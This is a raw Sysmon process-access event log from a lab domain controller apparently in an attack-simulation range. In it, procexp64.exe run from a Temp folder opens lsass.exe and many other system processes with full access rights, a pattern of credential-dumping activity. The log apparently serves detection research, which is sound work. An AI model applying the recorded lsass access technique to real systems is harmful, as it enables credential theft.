15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789047Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789046Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789045Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789044Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789043Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789042Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789041Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789040Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789039Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789038Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789037Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789036Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789035Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789034Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789033Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789032Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789031Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789030Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789029Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789028Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789027Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789026Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789025Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789024Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789023Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789022Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789021Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789020Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789019Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789018Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789017Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789016Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789015Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789014Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789013Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789012Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789011Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:30.126{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789244Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 